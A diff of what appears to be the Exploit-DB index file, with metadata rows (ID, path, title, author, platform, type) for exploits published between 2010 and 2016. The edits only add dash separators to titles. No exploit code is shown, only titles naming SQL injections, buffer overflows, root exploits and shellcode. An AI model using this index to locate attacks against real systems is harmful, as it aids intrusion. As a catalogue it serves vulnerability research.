 11647,platforms/windows/local/11647.pl,"Yahoo Player 1.0 - (.m3u/.pls/.ypl) Buffer Overflow Exploit (SEH)",2010-03-07,Mr.tro0oqy,windows,local,0
 11648,platforms/php/webapps/11648.txt,"bild flirt system 2.0 - index.php (id) SQL Injection",2010-03-07,"Easy Laster",php,webapps,0
 11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0
-11651,platforms/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.x / 1.7.x (<= 1.6.9p21 / <= 1.7.2p4) - Local Root Exploit",2010-03-07,kingcope,multiple,local,0
+11651,platforms/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit <= 1.6.9p21 / <= 1.7.2p4 - Local Root Exploit",2010-03-07,kingcope,multiple,local,0
 11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 m3u crash",2010-03-07,l3D,windows,dos,0
 11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus 'V4.rgo' (id) news.php - SQL Injection",2010-03-08,"Easy Laster",php,webapps,0
 11655,platforms/php/webapps/11655.txt,"TRIBISUR <= 2.0 - Local File Include",2010-03-08,"cr4wl3r ",php,webapps,0
@@ -10774,7 +10774,7 @@ id,file,description,date,author,platform,type,port
 11780,platforms/php/webapps/11780.html,"Clain_TIger_CMS CSRF",2010-03-17,"pratul agrawal",php,webapps,0
 11781,platforms/php/webapps/11781.html,"chilly_CMS CSRF",2010-03-17,"pratul agrawal",php,webapps,0
 11782,platforms/php/webapps/11782.txt,"Joomla Component com_include SQL Injection",2010-03-17,"DevilZ TM",php,webapps,0
-11783,platforms/php/webapps/11783.txt,"Preisschlacht Multi Liveshop System SQL Injection (seite&aid) index.php",2010-03-17,"Easy Laster",php,webapps,0
+11783,platforms/php/webapps/11783.txt,"Preisschlacht Multi Liveshop System - SQL Injection (seite&aid) index.php",2010-03-17,"Easy Laster",php,webapps,0
 11784,platforms/php/webapps/11784.txt,"PostNuke FormExpress Module Blind SQL Injection",2010-03-17,"Ali Abbasi",php,webapps,0
 11785,platforms/php/webapps/11785.txt,"Joomla Component com_ckforms - Multiple Vulnerabilities",2010-03-17,"ALTBTA ",php,webapps,0
 11786,platforms/windows/local/11786.txt,"Virtual PC Hypervisor Memory Protection",2010-03-17,"Core Security",windows,local,0
@@ -10795,7 +10795,7 @@ id,file,description,date,author,platform,type,port
 11805,platforms/php/webapps/11805.txt,"phpscripte24 Niedrig Gebote Pro Auktions System II Blind SQL Injection",2010-03-18,"Easy Laster",php,webapps,0
 11806,platforms/php/webapps/11806.txt,"nensor CMS 2.01 - Multiple Vulnerabilities",2010-03-18,"cr4wl3r ",php,webapps,0
 11807,platforms/php/webapps/11807.txt,"SOFTSAURUS 2.01 - Multiple Remote File Include Vulnerabilities",2010-03-18,"cr4wl3r ",php,webapps,0
-11808,platforms/php/webapps/11808.txt,"quality point 1.0 newsfeed (SQL/XSS) Multiple Vulnerabilities",2010-03-19,Red-D3v1L,php,webapps,0
+11808,platforms/php/webapps/11808.txt,"quality point 1.0 newsfeed - (SQL/XSS) Multiple Vulnerabilities",2010-03-19,Red-D3v1L,php,webapps,0
 11809,platforms/windows/dos/11809.py,"eDisplay Personal FTP server 1.0.0 - Pre-Authentication DoS (PoC)",2010-03-19,loneferret,windows,dos,21
 11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Crash SEH (PoC)",2010-03-19,loneferret,windows,dos,21
 11811,platforms/php/webapps/11811.txt,"phpscripte24 Preisschlacht Liveshop System SQL Injection (seite&aid) index.php",2010-03-19,"Easy Laster",php,webapps,0
@@ -10877,7 +10877,7 @@ id,file,description,date,author,platform,type,port
 11899,platforms/php/webapps/11899.html,"AdaptCMS_Lite_1.5 2009-07-07",2010-03-27,ITSecTeam,php,webapps,0
 11900,platforms/windows/local/11900.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - (.pls) Universal Stack BoF",2010-03-27,mat,windows,local,0
 11902,platforms/php/webapps/11902.txt,"MyOWNspace 8.2 - Multi Local File Include",2010-03-27,ITSecTeam,php,webapps,0
-11903,platforms/php/webapps/11903.txt,"Open Web Analytics 1.2.3 multi file include",2010-03-27,ITSecTeam,php,webapps,0
+11903,platforms/php/webapps/11903.txt,"Open Web Analytics 1.2.3 - multi file include",2010-03-27,ITSecTeam,php,webapps,0
 11904,platforms/php/webapps/11904.txt,"68kb multi Remote file include",2010-03-27,ITSecTeam,php,webapps,0
 11905,platforms/php/webapps/11905.txt,"Simple Machines Forum (SMF) <= 1.1.8 - (avatar) Remote PHP File Execute PoC",2010-03-27,JosS,php,webapps,0
 11906,platforms/php/webapps/11906.txt,"Uebimiau Webmail <= 2.7.2 - Multiple Vulnerabilities",2010-03-27,"cp77fk4r ",php,webapps,0
@@ -11365,7 +11365,7 @@ id,file,description,date,author,platform,type,port
 12455,platforms/php/webapps/12455.txt,"Ucenter Projekt 2.0 - Insecure crossdomain (XSS)",2010-04-29,indoushka,php,webapps,0
 12456,platforms/php/webapps/12456.txt,"chCounter indirect SQL Injection and XSS Vulnerabilities",2010-04-29,Valentin,php,webapps,0
 12457,platforms/windows/dos/12457.txt,"Apple Safari 4.0.3 - (Win32) CSS Remote Denial of Service Exploit",2010-04-29,ITSecTeam,windows,dos,0
-12458,platforms/php/webapps/12458.txt,"Scratcher (SQL/XSS) Multiple Remote",2010-04-29,"cr4wl3r ",php,webapps,0
+12458,platforms/php/webapps/12458.txt,"Scratcher - (SQL/XSS) Multiple Remote",2010-04-29,"cr4wl3r ",php,webapps,0
 12459,platforms/php/webapps/12459.txt,"ec21 clone 3.0 - (id) SQL Injection",2010-04-30,v3n0m,php,webapps,0
 12460,platforms/php/webapps/12460.txt,"b2b gold script - (id) SQL Injection",2010-04-30,v3n0m,php,webapps,0
 12461,platforms/php/webapps/12461.txt,"JobPost - SQLi",2010-04-30,Sid3^effects,php,webapps,0
@@ -11443,7 +11443,7 @@ id,file,description,date,author,platform,type,port
 12542,platforms/php/webapps/12542.rb,"phpscripte24 Shop System SQL Injection Exploit",2010-05-09,"Easy Laster",php,webapps,0
 12543,platforms/php/webapps/12543.rb,"Alibaba Clone <= 3.0 (Special) - SQL Injection Exploit",2010-05-09,"Easy Laster",php,webapps,0
 12544,platforms/php/webapps/12544.rb,"Alibaba Clone Diamond Version - SQL Injection Exploit",2010-05-09,"Easy Laster",php,webapps,0
-12545,platforms/php/webapps/12545.rb,"phpscripte24 Live Shopping Multi Portal System SQL Injection Exploit",2010-05-09,"Easy Laster",php,webapps,0
+12545,platforms/php/webapps/12545.rb,"phpscripte24 Live Shopping Multi Portal System - SQL Injection Exploit",2010-05-09,"Easy Laster",php,webapps,0
 12546,platforms/windows/dos/12546.pl,"Hyplay 1.2.326.1 - (.asx) Local DoS Crash PoC",2010-05-10,"Steve James",windows,dos,0
 12547,platforms/php/webapps/12547.txt,"e-webtech (new.asp?id=) SQL Injection",2010-05-10,protocol,php,webapps,0
 12550,platforms/php/webapps/12550.pl,"Netvidade engine 1.0 - Multiple Vulnerabilities",2010-05-10,pwndomina,php,webapps,0
@@ -11478,7 +11478,7 @@ id,file,description,date,author,platform,type,port
 12580,platforms/windows/remote/12580.txt,"miniwebsvr 0.0.10 - Directory Traversal/Listing Exploits",2010-05-12,Dr_IDE,windows,remote,0
 12581,platforms/windows/remote/12581.txt,"Zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0
 12582,platforms/windows/remote/12582.txt,"Zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0
-12583,platforms/php/webapps/12583.txt,"e-webtech (fixed_page.asp) SQL Injection",2010-05-12,FL0RiX,php,webapps,0
+12583,platforms/php/webapps/12583.txt,"e-webtech - (fixed_page.asp) SQL Injection",2010-05-12,FL0RiX,php,webapps,0
 12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 - (fckeditor) Remote Arbitrary File Upload",2010-05-12,eidelweiss,php,webapps,0
 12585,platforms/php/webapps/12585.txt,"4Images <= 1.7.7 - (image_utils.php) Remote Command Execution",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0
 12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection Exploit",2010-05-13,Cryptovirus,php,webapps,0
@@ -11642,7 +11642,7 @@ id,file,description,date,author,platform,type,port
 12762,platforms/freebsd/dos/12762.txt,"FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05)",2010-05-27,"Maksymilian Arciemowicz",freebsd,dos,0
 12763,platforms/php/webapps/12763.txt,"Script Upload Up Your Shell (Sql Inject)",2010-05-27,MouDy-Dz,php,webapps,0
 12766,platforms/php/webapps/12766.txt,"PPhlogger <= 2.2.5 - (trace.php) Remote Command Execution",2010-05-27,"Sn!pEr.S!Te Hacker",php,webapps,0
-12767,platforms/php/webapps/12767.txt,"parlic Design (SQL/XSS/HTML) Multiple Vulnerabilities",2010-05-27,XroGuE,php,webapps,0
+12767,platforms/php/webapps/12767.txt,"parlic Design - (SQL/XSS/HTML) Multiple Vulnerabilities",2010-05-27,XroGuE,php,webapps,0
 14321,platforms/windows/remote/14321.html,"Image22 ActiveX 1.1.1 - Buffer Overflow Exploit",2010-07-10,blake,windows,remote,0
 12768,platforms/php/webapps/12768.txt,"Hampshire Trading Standards Script SQL Injection",2010-05-27,Mr.P3rfekT,php,webapps,0
 12769,platforms/php/webapps/12769.txt,"Joomla Component MediQnA 1.1 - LFI",2010-05-27,kaMtiEz,php,webapps,0
@@ -11664,7 +11664,7 @@ id,file,description,date,author,platform,type,port
 12788,platforms/php/webapps/12788.txt,"Marketing Web Design - Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0
 12790,platforms/php/webapps/12790.txt,"Nucleus Plugin Twitter Remote File Inclusion",2010-05-29,AntiSecurity,php,webapps,0
 12791,platforms/php/webapps/12791.txt,"Aim Web Design - Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0
-12792,platforms/php/webapps/12792.txt,"MileHigh Creative (SQL/XSS/HTML Injection) Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0
+12792,platforms/php/webapps/12792.txt,"MileHigh Creative - (SQL/XSS/HTML Injection) Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0
 12793,platforms/php/webapps/12793.txt,"Cosmos Solutions CMS SQL Injection",2010-05-29,cyberlog,php,webapps,0
 12794,platforms/php/webapps/12794.txt,"Cosmos Solutions CMS SQL Injection (id= / page=)",2010-05-29,gendenk,php,webapps,0
 12796,platforms/php/webapps/12796.txt,"Joomla Component BF Quiz SQL Injection Exploit",2010-05-29,"Valentin Hoebel",php,webapps,0
@@ -11674,7 +11674,7 @@ id,file,description,date,author,platform,type,port
 12803,platforms/windows/local/12803.html,"IP2location.dll 1.0.0.1 - Function Initialize() Buffer Overflow",2010-05-30,sinn3r,windows,local,0
 12804,platforms/multiple/remote/12804.txt,"nginx http server <= 0.6.36 - Path Draversal",2010-05-30,"cp77fk4r ",multiple,remote,0
 12805,platforms/php/webapps/12805.txt,"Zeeways Script - Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0
-12806,platforms/php/webapps/12806.txt,"CMScout (XSS/HTML Injection) Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0
+12806,platforms/php/webapps/12806.txt,"CMScout - (XSS/HTML Injection) Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0
 12807,platforms/php/webapps/12807.txt,"Creato Script SQL Injection",2010-05-30,Mr.P3rfekT,php,webapps,0
 12808,platforms/php/webapps/12808.txt,"PTC Site's RCE/XSS",2010-05-30,CrazyMember,php,webapps,0
 12809,platforms/php/webapps/12809.txt,"Symphony CMS Local File Inclusion",2010-05-30,AntiSecurity,php,webapps,0
@@ -12326,7 +12326,7 @@ id,file,description,date,author,platform,type,port
 13990,platforms/asp/webapps/13990.txt,"Boat Classifieds SQL Injection",2010-06-22,Sangteamtham,asp,webapps,0
 13991,platforms/php/webapps/13991.txt,"Softbiz PHP FAQ Script Blind SQL Injection",2010-06-22,Sangteamtham,php,webapps,0
 13992,platforms/php/webapps/13992.txt,"Pre PHP Classifieds SQL Injection",2010-06-22,Sangteamtham,php,webapps,0
-13993,platforms/php/webapps/13993.txt,"k-search (SQL/XSS) Multiple Vulnerabilities",2010-06-22,Sangteamtham,php,webapps,0
+13993,platforms/php/webapps/13993.txt,"k-search - (SQL/XSS) Multiple Vulnerabilities",2010-06-22,Sangteamtham,php,webapps,0
 14512,platforms/php/webapps/14512.txt,"Concept E-commerce SQL Injection",2010-07-31,gendenk,php,webapps,0
 13995,platforms/asp/webapps/13995.txt,"Boat Classifieds (printdetail.asp?Id) SQL Injection",2010-06-23,CoBRa_21,asp,webapps,0
 13996,platforms/php/webapps/13996.txt,"Pre Multi-Vendor Shopping Malls (products.php?sid) SQL Injection",2010-06-23,CoBRa_21,php,webapps,0
@@ -12834,7 +12834,7 @@ id,file,description,date,author,platform,type,port
 14645,platforms/php/webapps/14645.txt,"Sports Accelerator Suite 2.0 - (news_id) Remote SQL Injection",2010-08-14,LiquidWorm,php,webapps,0
 14646,platforms/windows/dos/14646.py,"CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities PoC",2010-08-14,fdiskyou,windows,dos,0
 14647,platforms/php/webapps/14647.php,"PHP-Fusion Local File Inclusion",2010-08-15,MoDaMeR,php,webapps,0
-14648,platforms/php/webapps/14648.txt,"GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities",2010-08-15,"AnTi SeCuRe",php,webapps,0
+14648,platforms/php/webapps/14648.txt,"GuestBook Script PHP - (XSS/HTML Injection) Multiple Vulnerabilities",2010-08-15,"AnTi SeCuRe",php,webapps,0
 14651,platforms/windows/local/14651.py,"Rosoft media player 4.4.4 - SEH Buffer Overflow",2010-08-15,dijital1,windows,local,0
 14650,platforms/php/webapps/14650.html,"Zomplog CMS 3.9 - Multiple XSS/CSRF Vulnerabilities",2010-08-15,10n1z3d,php,webapps,0
 14654,platforms/php/webapps/14654.php,"CMSQLite <= 1.2 & CMySQLite <= 1.3.1 - Remote Code Execution Exploit",2010-08-15,BlackHawk,php,webapps,0
@@ -12971,7 +12971,7 @@ id,file,description,date,author,platform,type,port
 14831,platforms/windows/local/14831.rb,"SnackAmp 3.1.2 - SMP Buffer Overflow (SEH)",2010-08-29,"James Fitts",windows,local,0
 14832,platforms/windows/dos/14832.rb,"SnackAmp 3.1.2 - (.wav) Buffer Overflow (PoC)",2010-08-29,"James Fitts",windows,dos,0
 14833,platforms/php/webapps/14833.txt,"vBulletin 3.8.4 & 3.8.5 Registration Bypass",2010-08-29,"Immortal Boy",php,webapps,0
-14834,platforms/php/webapps/14834.txt,"Max's Guestbook (HTML Injection/XSS) Multiple Vulnerabilities",2010-08-29,"MiND C0re",php,webapps,0
+14834,platforms/php/webapps/14834.txt,"Max's Guestbook - (HTML Injection/XSS) Multiple Vulnerabilities",2010-08-29,"MiND C0re",php,webapps,0
 14835,platforms/php/webapps/14835.txt,"Multi-lingual E-Commerce System 0.2 - Multiple Remote File Inclusion Vulnerabilities",2010-08-29,JosS,php,webapps,0
 14837,platforms/php/webapps/14837.txt,"CF Image Hosting Script 1.3.8 - Remote File Inclusion",2010-08-29,"FoX HaCkEr",php,webapps,0
 14838,platforms/php/webapps/14838.txt,"Seagull 0.6.7 - SQL Injection",2010-08-29,Sweet,php,webapps,0
@@ -12980,7 +12980,7 @@ id,file,description,date,author,platform,type,port
 14841,platforms/php/webapps/14841.txt,"seagull 0.6.7 - Remote File Inclusion",2010-08-30,"FoX HaCkEr",php,webapps,0
 14843,platforms/windows/dos/14843.txt,"Apple QuickTime '_Marshaled_pUnk' Backdoor Param Client-Side Arbitrary Code Execution",2010-08-30,"Ruben Santamarta ",windows,dos,0
 14845,platforms/php/webapps/14845.txt,"Joomla Component (com_picsell) Local File Disclosure",2010-08-30,Craw,php,webapps,0
-14846,platforms/php/webapps/14846.txt,"Joomla Component (com_jefaqpro) Multiple Blind SQL Injection Vulnerabilities",2010-08-31,"Chip d3 bi0s",php,webapps,0
+14846,platforms/php/webapps/14846.txt,"Joomla Component (com_jefaqpro) - Multiple Blind SQL Injection Vulnerabilities",2010-08-31,"Chip d3 bi0s",php,webapps,0
 14849,platforms/php/webapps/14849.py,"mBlogger 1.0.04 (viewpost.php) - SQL Injection Exploit",2010-08-31,"Ptrace Security",php,webapps,0
 14854,platforms/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass (0Day)",2010-09-01,Abysssec,php,webapps,0
 14851,platforms/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion",2010-09-01,Andre_Corleone,php,webapps,0
@@ -13108,7 +13108,7 @@ id,file,description,date,author,platform,type,port
 15035,platforms/windows/dos/15035.py,"Apple QuickTime FLI LinePacket - Remote Code Execution",2010-09-18,Abysssec,windows,dos,0
 15037,platforms/php/webapps/15037.html,"CMSimple - CSRF",2010-09-18,Abysssec,php,webapps,0
 15039,platforms/php/webapps/15039.txt,"xt:Commerce Gambio 2008 - 2010 ERROR Based SQL Injection 'reviews.php'",2010-09-18,secret,php,webapps,0
-15040,platforms/php/webapps/15040.txt,"Joomla Component (com_restaurantguide) Multiple Vulnerabilities",2010-09-18,Valentin,php,webapps,0
+15040,platforms/php/webapps/15040.txt,"Joomla Component - (com_restaurantguide) Multiple Vulnerabilities",2010-09-18,Valentin,php,webapps,0
 15041,platforms/php/webapps/15041.py,"Maian Gallery 2 - Local File Download",2010-09-18,mr_me,php,webapps,0
 15044,platforms/asp/webapps/15044.txt,"jmd-cms - Multiple Vulnerabilities",2010-09-19,Abysssec,asp,webapps,0
 15046,platforms/php/webapps/15046.txt,"Fashione E-Commerce Webshop Multiple SQL Injection",2010-09-19,secret,php,webapps,0
@@ -13212,7 +13212,7 @@ id,file,description,date,author,platform,type,port
 15186,platforms/ios/remote/15186.txt,"iOS FileApp < 2.0 - Directory Traversal",2010-10-02,m0ebiusc0de,ios,remote,0
 15188,platforms/ios/dos/15188.py,"iOS FileApp < 2.0 - FTP Remote Denial of Service Exploit",2010-10-02,m0ebiusc0de,ios,dos,0
 15189,platforms/asp/webapps/15189.txt,"SmarterMail 7.x - (7.2.3925) LDAP Injection",2010-10-02,sqlhacker,asp,webapps,0
-15191,platforms/asp/webapps/15191.txt,"TradeMC E-Ticaret (SQL/XSS) Multiple Vulnerabilities",2010-10-02,KnocKout,asp,webapps,0
+15191,platforms/asp/webapps/15191.txt,"TradeMC E-Ticaret - (SQL/XSS) Multiple Vulnerabilities",2010-10-02,KnocKout,asp,webapps,0
 15194,platforms/php/webapps/15194.txt,"TinyMCE MCFileManager 2.1.2 - Arbitrary File Upload",2010-10-03,Hackeri-AL,php,webapps,0
 15200,platforms/php/webapps/15200.txt,"FAQMasterFlex 1.2 - SQL Injection",2010-10-04,cyb3r.anbu,php,webapps,0
 15201,platforms/windows/local/15201.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow (SEH DEP Bypass)",2010-10-04,"Muhamad Fadzil Ramli",windows,local,0
@@ -13693,7 +13693,7 @@ id,file,description,date,author,platform,type,port
 15770,platforms/php/webapps/15770.txt,"Download Center 2.2 - SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0
 15771,platforms/php/webapps/15771.txt,"SchuldnerBeratung SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0
 15772,platforms/php/webapps/15772.txt,"PayPal Shop Digital SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0
-15773,platforms/php/webapps/15773.txt,"Projekt Shop (details.php) Multiple SQL Injection Vulnerabilities",2010-12-18,"DeadLy DeMon",php,webapps,0
+15773,platforms/php/webapps/15773.txt,"Projekt Shop - (details.php) Multiple SQL Injection Vulnerabilities",2010-12-18,"DeadLy DeMon",php,webapps,0
 15774,platforms/linux/local/15774.c,"Linux Kernel < 2.6.37-rc2 - ACPI custom_method Privilege Escalation",2010-12-18,"Jon Oberheide",linux,local,0
 15775,platforms/php/webapps/15775.txt,"Mafia Game Script SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0
 15776,platforms/asp/webapps/15776.pl,"Virtual Store Open 3.0 Acess SQL Injection",2010-12-18,Br0ly,asp,webapps,0
@@ -13868,7 +13868,7 @@ id,file,description,date,author,platform,type,port
 16006,platforms/cgi/webapps/16006.html,"SmoothWall Express 3.0 - Multiple Vulnerabilities",2011-01-17,"dave b",cgi,webapps,0
 16009,platforms/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 - (.wav) Buffer Overflow Exploit",2011-01-18,h1ch4m,windows,local,0
 16010,platforms/php/webapps/16010.txt,"allCineVid Joomla Component 1.0.0 - Blind SQL Injection",2011-01-18,"Salvatore Fresta",php,webapps,0
-16011,platforms/php/webapps/16011.txt,"CakePHP <= 1.3.5 - / 1.2.8 unserialize()",2011-01-18,felix,php,webapps,0
+16011,platforms/php/webapps/16011.txt,"CakePHP <= 1.3.5 / 1.2.8 - unserialize()",2011-01-18,felix,php,webapps,0
 16013,platforms/php/webapps/16013.html,"N-13 News 3.4 - Remote Admin Add CSRF Exploit",2011-01-18,anT!-Tr0J4n,php,webapps,0
 16014,platforms/windows/remote/16014.html,"Novell iPrint <= 5.52 - ActiveX GetDriverSettings() Remote Exploit (ZDI-10-256)",2011-01-19,Dr_IDE,windows,remote,0
 17209,platforms/php/webapps/17209.txt,"SoftMP3 SQL Injection",2011-04-24,mArTi,php,webapps,0
@@ -14001,7 +14001,7 @@ id,file,description,date,author,platform,type,port
 16175,platforms/php/webapps/16175.txt,"Seo Panel 2.2.0 - SQL Injection Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0
 16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - Remote BoF (Post Auth)",2011-02-16,chap0,windows,remote,0
 16178,platforms/asp/webapps/16178.txt,"Rae Media Real Estate Single Agent SQL Injection",2011-02-16,R4dc0re,asp,webapps,0
-16179,platforms/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent SQL Injection",2011-02-16,R4dc0re,asp,webapps,0
+16179,platforms/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps,0
 16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - (.csv) Denial of Service",2011-02-17,b0telh0,windows,dos,0
 16181,platforms/php/webapps/16181.txt,"WordPress User Photo Component - Remote File Upload",2011-02-17,ADVtools,php,webapps,0
 16182,platforms/linux/dos/16182.txt,"PHP 5.3.5 - grapheme_extract() NULL Pointer Dereference",2011-02-17,"Maksymilian Arciemowicz",linux,dos,0
@@ -14126,7 +14126,7 @@ id,file,description,date,author,platform,type,port
 16323,platforms/solaris_sparc/remote/16323.rb,"Solaris dtspcd Heap Overflow",2010-04-30,Metasploit,solaris_sparc,remote,0
 16324,platforms/multiple/remote/16324.rb,"Solaris sadmind Command Execution",2010-06-22,Metasploit,multiple,remote,0
 16325,platforms/solaris/remote/16325.rb,"Sun Solaris sadmind adm_build_path() Buffer Overflow",2010-07-03,Metasploit,solaris,remote,0
-16326,platforms/solaris/remote/16326.rb,"Solaris ypupdated Command Execution",2010-07-25,Metasploit,solaris,remote,0
+16326,platforms/solaris/remote/16326.rb,"Solaris - ypupdated Command Execution",2010-07-25,Metasploit,solaris,remote,0
 16327,platforms/solaris/remote/16327.rb,"Solaris in.telnetd TTYPROMPT Buffer Overflow",2010-06-22,Metasploit,solaris,remote,0
 16328,platforms/solaris/remote/16328.rb,"Sun Solaris Telnet Remote Authentication Bypass",2010-06-22,Metasploit,solaris,remote,0
 16329,platforms/solaris/remote/16329.rb,"Samba lsa_io_trans_names Heap Overflow (Solaris)",2010-04-05,Metasploit,solaris,remote,0
@@ -14699,7 +14699,7 @@ id,file,description,date,author,platform,type,port
 16897,platforms/php/webapps/16897.rb,"BASE - base_qry_common Remote File Include",2010-11-24,Metasploit,php,webapps,0
 16899,platforms/php/webapps/16899.rb,"osCommerce 2.2 - Arbitrary PHP Code Execution",2010-07-03,Metasploit,php,webapps,0
 16901,platforms/php/webapps/16901.rb,"PAJAX Remote Command Execution",2010-04-30,Metasploit,php,webapps,0
-16902,platforms/php/webapps/16902.rb,"CakePHP <= 1.3.5 - / 1.2.8 Cache Corruption Exploit",2011-01-14,Metasploit,php,webapps,0
+16902,platforms/php/webapps/16902.rb,"CakePHP <= 1.3.5 / 1.2.8 - Cache Corruption Exploit",2011-01-14,Metasploit,php,webapps,0
 16903,platforms/php/remote/16903.rb,"OpenX banner-edit.php File Upload PHP Code Execution",2010-09-20,Metasploit,php,remote,0
 16904,platforms/php/webapps/16904.rb,"Trixbox CE 2.6.1 - langChoice PHP Local File Inclusion",2011-01-08,Metasploit,php,webapps,0
 16905,platforms/cgi/webapps/16905.rb,"AWStats (6.1-6.2) - configdir Remote Command Execution",2009-12-26,Metasploit,cgi,webapps,0
@@ -15679,7 +15679,7 @@ id,file,description,date,author,platform,type,port
 18047,platforms/php/webapps/18047.txt,"JEEMA Sms 3.2 Joomla Component - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
 18048,platforms/php/webapps/18048.txt,"Vik Real Estate 1.0 Joomla Component - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
 18049,platforms/windows/dos/18049.txt,"Microsys PROMOTIC 8.1.4 - ActiveX GetPromoticSite Unitialized Pointer",2011-10-13,"Luigi Auriemma",windows,dos,0
-18050,platforms/php/webapps/18050.txt,"Joomla HM-Community (com_hmcommunity) Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0
+18050,platforms/php/webapps/18050.txt,"Joomla HM-Community - (com_hmcommunity) Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0
 18051,platforms/windows/remote/18051.txt,"BroadWin WebAccess SCADA/HMI Client Remote Code Execution",2011-10-31,Snake,windows,remote,0
 18052,platforms/windows/dos/18052.php,"Oracle DataDirect ODBC Drivers HOST Attribute arsqls24.dll Stack Based Buffer Overflow PoC",2011-10-31,rgod,windows,dos,0
 18053,platforms/php/webapps/18053.txt,"WordPress Theme classipress <= 3.1.4 - Stored XSS",2011-10-31,"Paul Loftness",php,webapps,0
@@ -15770,7 +15770,7 @@ id,file,description,date,author,platform,type,port
 18163,platforms/linux_mips/shellcode/18163.c,"Linux/MIPS - Add user(UID 0) _rOOt_ with password _pwn3d_ shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode,0
 19400,platforms/php/webapps/19400.txt,"WordPress Website FAQ Plugin 1.0 - SQL Injection",2012-06-26,"Chris Kellum",php,webapps,0
 18165,platforms/windows/dos/18165.txt,"siemens automation license manager <= 500.0.122.1 - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0
-18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0
+18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0
 18167,platforms/php/webapps/18167.zip,"Bypass the JQuery-Real-Person captcha plugin (0Day)",2011-11-28,Alberto_García_Illera,php,webapps,0
 18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine Remote Code Execution",2011-11-30,Metasploit,multiple,remote,0
 18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200 / 4300 - Command Execution",2011-11-30,Metasploit,hardware,remote,0
@@ -15809,7 +15809,7 @@ id,file,description,date,author,platform,type,port
 18212,platforms/php/webapps/18212.txt,"phpBB MyPage Plugin SQL Injection",2011-12-07,CrazyMouse,php,webapps,0
 18213,platforms/php/webapps/18213.php,"Traq <= 2.3 - Authentication Bypass / Remote Code Execution Exploit",2011-12-07,EgiX,php,webapps,0
 18214,platforms/php/webapps/18214.py,"SMF <= 2.0.1 - SQL Injection & Privilege Escalation",2011-12-07,The:Paradox,php,webapps,0
-18220,platforms/windows/dos/18220.py,"CyberLink Multiple Products File Project Handling Stack Buffer Overflow PoC",2011-12-09,modpr0be,windows,dos,0
+18220,platforms/windows/dos/18220.py,"CyberLink Multiple Products - File Project Handling Stack Buffer Overflow PoC",2011-12-09,modpr0be,windows,dos,0
 18221,platforms/linux/dos/18221.c,"Apache HTTP Server Denial of Service",2011-12-09,"Ramon de C Valle",linux,dos,0
 18222,platforms/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection",2011-12-09,Don,php,webapps,0
 18223,platforms/windows/dos/18223.pl,"Free Opener Local Denial of Service",2011-12-09,"Iolo Morganwg",windows,dos,0
@@ -17076,7 +17076,7 @@ id,file,description,date,author,platform,type,port
 19711,platforms/windows/dos/19711.txt,"Ipswitch IMail 5.0.8/6.0/6.1 IMonitor status.cgi DoS",2000-01-05,"Ussr Labs",windows,dos,0
 19712,platforms/multiple/remote/19712.txt,"Allaire ColdFusion Server 4.0/4.0.1 - CFCACHE",2000-01-04,anonymous,multiple,remote,0
 19713,platforms/cgi/remote/19713.pl,"Solution Scripts Home Free 1.0 - search.cgi Directory Traversal",2000-01-03,"k0ad k1d",cgi,remote,0
-40086,platforms/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB Code Execution",2016-07-11,Metasploit,ruby,remote,80
+40086,platforms/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB - Code Execution",2016-07-11,Metasploit,ruby,remote,80
